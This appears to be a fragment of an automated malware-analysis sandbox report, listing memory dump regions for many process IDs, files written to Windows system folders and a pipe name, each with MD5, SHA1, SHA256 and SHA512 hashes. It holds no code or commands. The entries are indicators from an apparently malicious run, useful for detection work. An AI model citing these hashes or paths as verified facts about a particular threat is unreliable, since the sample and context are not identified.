| SHA512 | a584893714d46c6bdf4cc0a097b5f088a9aa49eea07b181745ca9b351b570c8ac3487bfe53a8a97213f5d8a7f71dbf4070ff92eab58b2ff7a4d0e784e17d02d4 |
memory/2444-14-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/2444-15-0x0000000000350000-0x000000000038E000-memory.dmp
memory/2444-16-0x00000000772C0000-0x0000000077469000-memory.dmp
memory/2444-17-0x00000000771A0000-0x00000000772BF000-memory.dmp
memory/2436-20-0x00000000772C0000-0x0000000077469000-memory.dmp
memory/2436-22-0x0000000140000000-0x0000000140040000-memory.dmp
memory/480-40-0x0000000037300000-0x0000000037310000-memory.dmp
memory/1128-163-0x0000000037300000-0x0000000037310000-memory.dmp
memory/1128-162-0x000007FEBD7E0000-0x000007FEBD7F0000-memory.dmp
memory/820-151-0x0000000000510000-0x000000000053A000-memory.dmp
memory/3028-221-0x0000000002340000-0x0000000002348000-memory.dmp
memory/3028-219-0x000000001B5C0000-0x000000001B8A2000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y3HEYY3NXB0XSRSCTWJU.temp
| MD5 | 6ba3787c6ac93c99b47357beb7c74aa8 |
| SHA1 | b14c606859169b3ab9b31a171b9a7b485344b9ce |
| SHA256 | 28fef2bb1b9f2466b97b010133d97b7a32de60a4f9621e4a46087ad0b036092d |
| SHA512 | 72d7e1c07f3365cd28a2a77c7e267d7a895baecdbc464c4dbb291c85b88b88e1e9f0e0424da4dfad451aaa06f5d04519f8bbb277cf7a26d11d0ecdb7df12d531 |
memory/2444-232-0x0000000000460000-0x0000000000472000-memory.dmp
memory/764-149-0x0000000037300000-0x0000000037310000-memory.dmp
memory/764-148-0x000007FEBD7E0000-0x000007FEBD7F0000-memory.dmp
memory/764-147-0x0000000000C80000-0x0000000000CAA000-memory.dmp
memory/680-145-0x0000000037300000-0x0000000037310000-memory.dmp
memory/680-144-0x000007FEBD7E0000-0x000007FEBD7F0000-memory.dmp
memory/680-143-0x00000000005F0000-0x000000000061A000-memory.dmp
memory/480-39-0x000007FEBD7E0000-0x000007FEBD7F0000-memory.dmp
memory/480-38-0x0000000000250000-0x000000000027A000-memory.dmp
memory/428-36-0x0000000037300000-0x0000000037310000-memory.dmp
memory/428-35-0x000007FEBD7E0000-0x000007FEBD7F0000-memory.dmp
memory/428-34-0x0000000000C30000-0x0000000000C5A000-memory.dmp
memory/496-33-0x00000000000D0000-0x00000000000FA000-memory.dmp
memory/428-26-0x0000000000C00000-0x0000000000C23000-memory.dmp
memory/428-24-0x0000000000C00000-0x0000000000C23000-memory.dmp
memory/2436-21-0x00000000771A0000-0x00000000772BF000-memory.dmp
memory/2436-19-0x0000000140000000-0x0000000140040000-memory.dmp
memory/2436-18-0x0000000140000000-0x0000000140040000-memory.dmp
memory/1552-298-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/1552-328-0x0000000000BC0000-0x0000000000BD2000-memory.dmp
memory/1248-327-0x0000000000290000-0x00000000002FC000-memory.dmp
memory/2388-523-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/2664-536-0x0000000000290000-0x00000000002FC000-memory.dmp
memory/2388-628-0x0000000000810000-0x0000000000822000-memory.dmp
memory/2692-706-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/2256-723-0x0000000000290000-0x00000000002FC000-memory.dmp
memory/1912-878-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/2428-918-0x0000000000290000-0x00000000002FC000-memory.dmp
memory/1912-998-0x0000000000810000-0x0000000000822000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2148-1079-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/984-1265-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/984-1369-0x00000000006A0000-0x00000000006B2000-memory.dmp
memory/320-1442-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/2148-1463-0x0000000000290000-0x00000000002FC000-memory.dmp
memory/2564-1622-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/1176-1710-0x0000000000290000-0x00000000002FC000-memory.dmp
memory/2564-1730-0x0000000000BC0000-0x0000000000BD2000-memory.dmp
memory/1856-1816-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/2780-1841-0x0000000000290000-0x00000000002FC000-memory.dmp
memory/1412-2005-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/500-2060-0x0000000000290000-0x00000000002FC000-memory.dmp
memory/2092-2196-0x0000000000290000-0x00000000002FC000-memory.dmp
memory/1496-2201-0x0000000000720000-0x0000000000732000-memory.dmp
memory/1204-2405-0x0000000000290000-0x00000000002FC000-memory.dmp
memory/2680-2579-0x0000000000290000-0x00000000002FC000-memory.dmp
memory/2480-2735-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/1920-3063-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/2204-3090-0x0000000000290000-0x00000000002FC000-memory.dmp
memory/988-3559-0x0000000000290000-0x00000000002FC000-memory.dmp
memory/2100-3657-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/2776-3769-0x0000000000290000-0x00000000002FC000-memory.dmp
memory/2812-3964-0x0000000000BC0000-0x0000000000BD2000-memory.dmp
memory/616-4082-0x0000000000290000-0x00000000002FC000-memory.dmp
memory/1164-4183-0x0000000000660000-0x0000000000672000-memory.dmp
memory/1568-4640-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/1568-4752-0x0000000000BC0000-0x0000000000BD2000-memory.dmp
memory/452-4968-0x0000000000410000-0x0000000000422000-memory.dmp
C:\Windows\System32\perfh011.dat
| MD5 | 54c674d19c0ff72816402f66f6c3d37c |
| SHA1 | 2dcc0269545a213648d59dc84916d9ec2d62a138 |
| SHA256 | 646d4ea2f0670691aa5b998c26626ede7623886ed3ac9bc9679018f85e584bb5 |
| SHA512 | 4d451e9bef2c451cb9e86c7f4d705be65787c88df5281da94012bfbe5af496718ec3e48099ec3dff1d06fee7133293f10d649866fe59daa7951aebe2e5e67c1f |
C:\Windows\System32\perfh010.dat
| MD5 | 4623482c106cf6cc1bac198f31787b65 |
| SHA1 | 5abb0decf7b42ef5daf7db012a742311932f6dad |
| SHA256 | eceda45aedbf6454b79f010c891bead3844d43189972f6beeb5ccddb13cc0349 |
| SHA512 | afecefcec652856dd8b4275f11d75a68a582337b682309c4b61fd26ed7038b92e6b9aa72c1bfc350ce2caf5e357098b54eb1e448a4392960f9f82e01c447669f |
C:\Windows\System32\perfc010.dat
| MD5 | d73172c6cb697755f87cd047c474cf91 |
| SHA1 | abc5c7194abe32885a170ca666b7cce8251ac1d6 |
| SHA256 | 9de801eebbe32699630f74082c9adea15069acd5afb138c9ecd5d4904e3cdc57 |
| SHA512 | 7c9e4126bed6bc94a211281eed45cee30452519f125b82b143f78da32a3aac72d94d31757e1da22fb2f8a25099ffddec992e2c60987efb9da9b7a17831eafdf6 |
C:\Windows\System32\perfh00C.dat
| MD5 | 5f684ce126de17a7d4433ed2494c5ca9 |
| SHA1 | ce1a30a477daa1bac2ec358ce58731429eafe911 |
| SHA256 | 2e2ba0c47e71991d646ec380cde47f44318d695e6f3f56ec095955a129af1c2c |
| SHA512 | 4d0c2669b5002da14d44c21dc2f521fb37b6b41b61bca7b2a9af7c03f616dda9ca825f79a81d3401af626a90017654f9221a6ccc83010ff73de71967fc2f3f5b |
C:\Windows\System32\perfc00C.dat
| MD5 | ce233fa5dc5adcb87a5185617a0ff6ac |
| SHA1 | 2e2747284b1204d3ab08733a29fdbabdf8dc55b9 |
| SHA256 | 68d4de5e72cfd117151c44dd6ec74cf46fafd6c51357895d3025d7dac570ce31 |
| SHA512 | 1e9c8e7f12d7c87b4faa0d587a8b374e491cd44f23e13fdb64bde3bc6bf3f2a2d3aba5444a13b199a19737a8170ee8d4ead17a883fbaee66b8b32b35b7577fc2 |
C:\Windows\System32\perfh00A.dat
| MD5 | 7d0bac4e796872daa3f6dc82c57f4ca8 |
| SHA1 | b4f6bbe08fa8cd0784a94ac442ff937a3d3eea0a |
| SHA256 | ce2ef9fc248965f1408d4b7a1e6db67494ba07a7bbdfa810418b30be66ad5879 |
| SHA512 | 145a0e8543e0d79fe1a5ce268d710c807834a05da1e948f84d6a1818171cd4ef077ea44ba1fe439b07b095721e0109cbf7e4cfd7b57519ee44d9fd9fe1169a3e |
C:\Windows\System32\perfc00A.dat
| MD5 | f0ecfbfa3e3e59fd02197018f7e9cb84 |
| SHA1 | 961e9367a4ef3a189466c0a0a186faf8958bdbc4 |
| SHA256 | cfa293532a1b865b95093437d82bf8b682132aa335957f0c6d95edfbcc372324 |
| SHA512 | 116e648cb3b591a6a94da5ef11234778924a2ff9e0b3d7f6f00310d8a58914d12f5ee1b63c2f88701bb00538ad0e42ae2561575333c5a1d63bb8c86863ac6294 |
C:\Windows\System32\perfh009.dat
| MD5 | aecab86cc5c705d7a036cba758c1d7b0 |
| SHA1 | e88cf81fd282d91c7fc0efae13c13c55f4857b5e |
| SHA256 | 9bab92e274fcc0af88a7fdd143c9045b9d3a13cac2c00b63f00b320128dcc066 |
| SHA512 | e0aa8da41373fc64d0e3dc86c9e92a9dd5232f6bcae42dfe6f79012d7e780de85511a9ec6941cb39476632972573a18063d3ecd8b059b1d008d34f585d9edbe8 |
C:\Windows\System32\perfh007.dat
| MD5 | b69ab3aeddb720d6ef8c05ff88c23b38 |
| SHA1 | d830c2155159656ed1806c7c66cae2a54a2441fa |
| SHA256 | 24c81302014118e07ed97eaac0819ecf191e0cc3d69c02b16ecda60ac4718625 |
| SHA512 | 4c7a99d45fb6e90c206439dcdd7cd198870ea5397a6584bb666eed53a8dc36faaac0b9cfc786a3ab4ecbbecc3a4ddd91560246d83b3319f2e37c1ed4bdbec32d |
C:\Windows\System32\perfc007.dat
| MD5 | 19c7052de3b7281b4c1c6bfbb543c5dc |
| SHA1 | d2e12081a14c1069c89f2cee7357a559c27786e7 |
| SHA256 | 14ed6cb3198e80964cbc687a60aed24fb68d1bbd7588f983dc1fc6ae63514b4a |
| SHA512 | 289ca791909882c857014bd24e777fa84b533896508b562051b529d4c27e0d98bc41c801c6384b382f5dc0fa584dc8f713939c636543b0a5cf5ea2b396300f83 |
C:\Windows\System32\perfc011.dat
| MD5 | 045b3a28859ed815f97e17fcebadf523 |
| SHA1 | a3cfaf297b3ef6d2e7ae0e33b9e7a3f212c7c5bd |
| SHA256 | 690ebf33940e7d22aeef120d30cc8b1731b2b18ce0cb4b2db89679735809312c |
| SHA512 | d1836a85871c5c11efc407827bb87af4356297a8c498310de45cb322827082622c56cccee7d22c2e2a2f6894a33589534b9f516736005107571d7efade1e9de5 |
C:\Windows\System32\wbem\Performance\WmiApRpl.h
| MD5 | b133a676d139032a27de3d9619e70091 |
| SHA1 | 1248aa89938a13640252a79113930ede2f26f1fa |
| SHA256 | ae2b6236d3eeb4822835714ae9444e5dcd21bc60f7a909f2962c43bc743c7b15 |
| SHA512 | c6b99e13d854ce7a6874497473614ee4bd81c490802783db1349ab851cd80d1dc06df8c1f6e434aba873a5bbf6125cc64104709064e19a9dc1c66dcde3f898f5 |
C:\Windows\System32\wbem\Performance\WmiApRpl.ini
| MD5 | 46d08e3a55f007c523ac64dce6dcf478 |
| SHA1 | 62edf88697e98d43f32090a2197bead7e7244245 |
| SHA256 | 5b15b1fc32713447c3fbc952a0fb02f1fd78c6f9ac69087bdb240625b0282614 |
| SHA512 | b1f42e70c0ba866a9ed34eb531dbcbae1a659d7349c1e1a14b18b9e23d8cbd302d8509c6d3a28bc7509dd92e83bcb400201fb5d5a70f613421d81fe649d02e42 |
memory/2604-5371-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/2604-5469-0x00000000007A0000-0x00000000007B2000-memory.dmp
memory/452-5579-0x0000000000290000-0x00000000002FC000-memory.dmp
memory/1984-5757-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/356-5984-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/2548-6000-0x0000000000290000-0x00000000002FC000-memory.dmp
memory/356-6097-0x0000000002090000-0x00000000020A2000-memory.dmp
memory/2224-6310-0x00000000008E0000-0x00000000008F2000-memory.dmp
memory/1932-6528-0x0000000002330000-0x0000000002342000-memory.dmp
memory/2600-6894-0x0000000000290000-0x00000000002FC000-memory.dmp
memory/1144-6988-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/816-7174-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/816-7282-0x0000000000810000-0x0000000000822000-memory.dmp
memory/3016-7460-0x0000000000610000-0x0000000000622000-memory.dmp
memory/2616-7941-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/2452-8619-0x0000000002510000-0x0000000002522000-memory.dmp
memory/1880-8798-0x0000000000580000-0x0000000000592000-memory.dmp
memory/840-9281-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/2136-9677-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/1512-9699-0x0000000000290000-0x00000000002FC000-memory.dmp
memory/2352-9874-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/1852-10307-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/2304-10554-0x0000000000290000-0x00000000002FC000-memory.dmp
memory/2092-10756-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/2092-10853-0x0000000000BC0000-0x0000000000BD2000-memory.dmp